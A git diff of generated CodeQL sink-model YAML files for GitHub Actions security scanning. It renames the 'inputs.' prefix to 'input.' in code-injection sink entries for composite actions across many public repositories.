diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml index 13a9ff475b9..d618f7b761f 100644 --- a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/opendal", "*", "inputs.feature", "code-injection", "generated"] - - ["apache/opendal", "*", "inputs.setup", "code-injection", "generated"] - - ["apache/opendal", "*", "inputs.service", "code-injection", "generated"] - - ["apache/opendal", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file + - ["apache/opendal", "*", "input.feature", "code-injection", "generated"] + - ["apache/opendal", "*", "input.setup", "code-injection", "generated"] + - ["apache/opendal", "*", "input.service", "code-injection", "generated"] + - ["apache/opendal", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml index a173154bec0..c49315d791a 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/pekko", "*", "inputs.upload", "code-injection", "generated"] \ No newline at end of file + - ["apache/pekko", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml index f7a5017d2fb..f58fcf336fc 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/pulsar-helm-chart", "*", "inputs.limit-access-to-users", "code-injection", "generated"] - - ["apache/pulsar-helm-chart", "*", "inputs.limit-access-to-actor", "code-injection", "generated"] - - ["apache/pulsar-helm-chart", "*", "inputs.secure-access", "code-injection", "generated"] - - ["apache/pulsar-helm-chart", "*", "inputs.action", "code-injection", "generated"] - - ["apache/pulsar-helm-chart", "*", "inputs.yamale_version", "code-injection", "generated"] - - ["apache/pulsar-helm-chart", "*", "inputs.yamllint_version", "code-injection", "generated"] - - ["apache/pulsar-helm-chart", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-users", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-actor", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.secure-access", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.action", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.yamale_version", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.yamllint_version", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml index 1bcf118810f..4812eaa5b4a 100644 --- a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["apache/superset", "*", "inputs.requirements-type", "code-injection", "generated"] \ No newline at end of file + - ["apache/superset", "*", "input.requirements-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml index fb210d5af55..de8c3e1b725 100644 --- a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml +++ b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["appflowy-io/appflowy", "*", "inputs.test_path", "code-injection", "generated"] - - ["appflowy-io/appflowy", "*", "inputs.flutter_profile", "code-injection", "generated"] \ No newline at end of file + - ["appflowy-io/appflowy", "*", "input.test_path", "code-injection", "generated"] + - ["appflowy-io/appflowy", "*", "input.flutter_profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml index 77554b9872e..dee268884a1 100644 --- a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["aptos-labs/aptos-core", "*", "inputs.GIT_CREDENTIALS", "code-injection", "generated"] - - ["aptos-labs/aptos-core", "*", "inputs.GCP_DOCKER_ARTIFACT_REPO", "code-injection", "generated"] - - ["aptos-labs/aptos-core", "*", "inputs.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file + - ["aptos-labs/aptos-core", "*", "input.GIT_CREDENTIALS", "code-injection", "generated"] + - ["aptos-labs/aptos-core", "*", "input.GCP_DOCKER_ARTIFACT_REPO", "code-injection", "generated"] + - ["aptos-labs/aptos-core", "*", "input.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml index 7fc1eaaca48..5e0e5158390 100644 --- a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml +++ b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["archivesspace/archivesspace", "*", "inputs.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file + - ["archivesspace/archivesspace", "*", "input.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml index 921095f8a38..bb4b41a0592 100644 --- a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml +++ b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["armadaproject/armada", "*", "inputs.tox-env", "code-injection", "generated"] \ No newline at end of file + - ["armadaproject/armada", "*", "input.tox-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml index e8dba39c742..ef3a84762db 100644 --- a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml +++ b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml 
@@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["armbian/build", "*", "inputs.armbian_pgp_password", "code-injection", "generated"] - - ["armbian/build", "*", "inputs.armbian_extensions", "code-injection", "generated"] - - ["armbian/build", "*", "inputs.armbian_release", "code-injection", "generated"] - - ["armbian/build", "*", "inputs.armbian_kernel_branch", "code-injection", "generated"] - - ["armbian/build", "*", "inputs.armbian_board", "code-injection", "generated"] - - ["armbian/build", "*", "inputs.armbian_target", "code-injection", "generated"] - - ["armbian/build", "*", "inputs.armbian_branch", "code-injection", "generated"] - - ["armbian/build", "*", "inputs.armbian_ui", "code-injection", "generated"] - - ["armbian/build", "*", "inputs.armbian_version", "code-injection", "generated"] \ No newline at end of file + - ["armbian/build", "*", "input.armbian_pgp_password", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_extensions", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_release", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_kernel_branch", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_board", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_target", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_branch", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_ui", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml index 69970d3419b..425242bf220 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["auth0/auth0-java", "*", "inputs.signing-password", "code-injection", "generated"] - - ["auth0/auth0-java", "*", "inputs.signing-key", "code-injection", "generated"] - - ["auth0/auth0-java", "*", "inputs.ossr-password", "code-injection", "generated"] - - ["auth0/auth0-java", "*", "inputs.ossr-username", "code-injection", "generated"] \ No newline at end of file + - ["auth0/auth0-java", "*", "input.signing-password", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "input.signing-key", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "input.ossr-password", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "input.ossr-username", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml index b57797cc643..62f1ed005ed 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["auth0/auth0.net", "*", "inputs.nuget-token", "code-injection", "generated"] - - ["auth0/auth0.net", "*", "inputs.nuget-directory", "code-injection", "generated"] - - ["auth0/auth0.net", "*", "inputs.project-paths", "code-injection", "generated"] \ No newline at end of file + - ["auth0/auth0.net", "*", "input.nuget-token", "code-injection", "generated"] + - ["auth0/auth0.net", "*", "input.nuget-directory", "code-injection", "generated"] + - ["auth0/auth0.net", "*", "input.project-paths", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml index 08b65cea6d7..098b460bbd8 100644 
--- a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["auth0/auth0.swift", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file + - ["auth0/auth0.swift", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml index 453e60f3595..d5a257be220 100644 --- a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml +++ b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["autogluon/autogluon", "*", "inputs.submodule-to-test", "code-injection", "generated"] - - ["autogluon/autogluon", "*", "inputs.command", "code-injection", "generated"] - - ["autogluon/autogluon", "*", "inputs.work-dir", "code-injection", "generated"] - - ["autogluon/autogluon", "*", "inputs.job-name", "code-injection", "generated"] - - ["autogluon/autogluon", "*", "inputs.job-type", "code-injection", "generated"] \ No newline at end of file + - ["autogluon/autogluon", "*", "input.submodule-to-test", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "input.command", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "input.work-dir", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "input.job-name", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "input.job-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml index 012802b8006..53c6258551f 100644 
--- a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml +++ b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["avaiga/taipy", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file + - ["avaiga/taipy", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml index a397a77f6dc..62a4f2bbcd7 100644 --- a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["aws-amplify/amplify-cli", "*", "inputs.cli-version", "code-injection", "generated"] \ No newline at end of file + - ["aws-amplify/amplify-cli", "*", "input.cli-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml index 15de610c981..ac72bb9ebf0 100644 --- a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["aws/amazon-vpc-cni-k8s", "*", "inputs.go-package", "code-injection", "generated"] - - ["aws/amazon-vpc-cni-k8s", "*", "inputs.work-dir", "code-injection", "generated"] \ No newline at end of file + - ["aws/amazon-vpc-cni-k8s", "*", "input.go-package", "code-injection", "generated"] + - ["aws/amazon-vpc-cni-k8s", "*", "input.work-dir", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml index ad6e7e806cd..b3f1ca67eef 100644 --- a/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["aws/karpenter-provider-aws", "*", "inputs.account_id", "code-injection", "generated"] - - ["aws/karpenter-provider-aws", "*", "inputs.cluster_name", "code-injection", "generated"] \ No newline at end of file + - ["aws/karpenter-provider-aws", "*", "input.account_id", "code-injection", "generated"] + - ["aws/karpenter-provider-aws", "*", "input.cluster_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml index 67631102d71..44f5ad66096 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml 
@@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["awslabs/amazon-eks-ami", "*", "inputs.max_resource_age_duration", "code-injection", "generated"] - - ["awslabs/amazon-eks-ami", "*", "inputs.aws_region", "code-injection", "generated"] - - ["awslabs/amazon-eks-ami", "*", "inputs.ami_id", "code-injection", "generated"] - - ["awslabs/amazon-eks-ami", "*", "inputs.k8s_version", "code-injection", "generated"] - - ["awslabs/amazon-eks-ami", "*", "inputs.os_distro", "code-injection", "generated"] - - ["awslabs/amazon-eks-ami", "*", "inputs.additional_arguments", "code-injection", "generated"] - - ["awslabs/amazon-eks-ami", "*", "inputs.build_id", "code-injection", "generated"] \ No newline at end of file + - ["awslabs/amazon-eks-ami", "*", "input.max_resource_age_duration", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.aws_region", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.ami_id", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.k8s_version", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.os_distro", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.additional_arguments", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.build_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml index 098d7c139fa..c2e56f7e175 100644 --- a/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml +++ b/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["awslabs/aws-lambda-rust-runtime", "*", "inputs.package", "code-injection", "generated"] \ No newline at end of file + - ["awslabs/aws-lambda-rust-runtime", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml index def12e48741..54d0c8b2fe0 100644 --- a/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml +++ b/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["azerothcore/azerothcore-wotlk", "*", "inputs.CXX", "code-injection", "generated"] - - ["azerothcore/azerothcore-wotlk", "*", "inputs.CC", "code-injection", "generated"] \ No newline at end of file + - ["azerothcore/azerothcore-wotlk", "*", "input.CXX", "code-injection", "generated"] + - ["azerothcore/azerothcore-wotlk", "*", "input.CC", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml index 768db7317cc..b1914e7a96b 100644 --- a/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml +++ b/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["azure/azure-datafactory", "*", "inputs.directory", "code-injection", "generated"] - - ["azure/azure-datafactory", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["azure/azure-datafactory", "*", "input.directory", "code-injection", "generated"] + - ["azure/azure-datafactory", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml index 55218009c02..dd66f206ee9 100644 --- a/ql/lib/ext/generated/composite-actions/badges_shields.model.yml +++ b/ql/lib/ext/generated/composite-actions/badges_shields.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["badges/shields", "*", "inputs.npm-version", "code-injection", "generated"] \ No newline at end of file + - ["badges/shields", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml index 17ec5471e85..0c26f02e6d8 100644 --- a/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["balena-io/etcher", "*", "inputs.VERBOSE", "code-injection", "generated"] \ No newline at end of file + - ["balena-io/etcher", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml index 55cd8b18241..2ee13115d6d 100644 
--- a/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml +++ b/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["balena-os/balena-engine", "*", "inputs.VERBOSE", "code-injection", "generated"] \ No newline at end of file + - ["balena-os/balena-engine", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml index 328d58d9e42..c76ed5b6604 100644 --- a/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml +++ b/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ben-manes/caffeine", "*", "inputs.attempt-delay", "code-injection", "generated"] - - ["ben-manes/caffeine", "*", "inputs.attempt-limit", "code-injection", "generated"] - - ["ben-manes/caffeine", "*", "inputs.arguments", "code-injection", "generated"] - - ["ben-manes/caffeine", "*", "inputs.graal", "code-injection", "generated"] - - ["ben-manes/caffeine", "*", "inputs.java", "code-injection", "generated"] \ No newline at end of file + - ["ben-manes/caffeine", "*", "input.attempt-delay", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "input.attempt-limit", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "input.arguments", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "input.graal", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "input.java", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml index 836bda1041a..0bdf2087b46 100644 
--- a/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml +++ b/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["bokeh/bokeh", "*", "inputs.test-env", "code-injection", "generated"] \ No newline at end of file + - ["bokeh/bokeh", "*", "input.test-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml index b6f9ee027f1..bb83a5964e7 100644 --- a/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml +++ b/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["botpress/botpress", "*", "inputs.tilt_cmd", "code-injection", "generated"] \ No newline at end of file + - ["botpress/botpress", "*", "input.tilt_cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml index 2f6458219b6..f29c52b1bf5 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["braintree/braintree-android-drop-in", "*", "inputs.version", "code-injection", "generated"] - - ["braintree/braintree-android-drop-in", "*", "inputs.signing_file_path", "code-injection", "generated"] - - ["braintree/braintree-android-drop-in", "*", "inputs.signing_key_file", "code-injection", "generated"] \ No newline at end of file + - ["braintree/braintree-android-drop-in", "*", "input.version", "code-injection", "generated"] + - ["braintree/braintree-android-drop-in", "*", "input.signing_file_path", "code-injection", "generated"] + - ["braintree/braintree-android-drop-in", "*", "input.signing_key_file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml index 374a13ccd82..43745006f8d 100644 --- a/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["braintree/braintree/android", "*", "inputs.version", "code-injection", "generated"] - - ["braintree/braintree/android", "*", "inputs.module", "code-injection", "generated"] - - ["braintree/braintree/android", "*", "inputs.signing_file_path", "code-injection", "generated"] - - ["braintree/braintree/android", "*", "inputs.signing_key_file", "code-injection", "generated"] \ No newline at end of file + - ["braintree/braintree/android", "*", "input.version", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "input.module", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "input.signing_file_path", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "input.signing_key_file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml index fb4608ec70b..9289afb744f 100644 --- a/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml +++ b/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["broadinstitute/gatk", "*", "inputs.identifier", "code-injection", "generated"] - - ["broadinstitute/gatk", "*", "inputs.repo-path", "code-injection", "generated"] - - ["broadinstitute/gatk", "*", "inputs.CROMWELL_VERSION", "code-injection", "generated"] \ No newline at end of file + - ["broadinstitute/gatk", "*", "input.identifier", "code-injection", "generated"] + - ["broadinstitute/gatk", "*", "input.repo-path", "code-injection", "generated"] + - ["broadinstitute/gatk", "*", "input.CROMWELL_VERSION", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml index 3a6a4575d30..9729f966813 100644 --- a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml +++ b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["canonical/multipass", "*", "inputs.release-tag-re", "code-injection", "generated"] - - ["canonical/multipass", "*", "inputs.release-branch-re", "code-injection", "generated"] \ No newline at end of file + - ["canonical/multipass", "*", "input.release-tag-re", "code-injection", "generated"] + - ["canonical/multipass", "*", "input.release-branch-re", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml index d21c609e5ed..92c25953944 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["chia-network/actions", "*", "inputs.keypair_path", "code-injection", "generated"] - - ["chia-network/actions", "*", "inputs.role_name", "code-injection", "generated"] - - ["chia-network/actions", "*", "inputs.backend_name", "code-injection", "generated"] - - ["chia-network/actions", "*", "inputs.vault_url", "code-injection", "generated"] - - ["chia-network/actions", "*", "inputs.ttl", "code-injection", "generated"] - - ["chia-network/actions", "*", "inputs.vault_token", "code-injection", "generated"] \ No newline at end of file + - ["chia-network/actions", "*", "input.keypair_path", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.role_name", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.backend_name", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.vault_url", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.ttl", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.vault_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml index 76c92f51d26..c572c11ada4 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["chia-network/chia-blockchain", "*", "inputs.command-prefix", "code-injection", "generated"] \ No newline at end of file + - ["chia-network/chia-blockchain", "*", "input.command-prefix", "code-injection", "generated"] \ No newline at end of file 
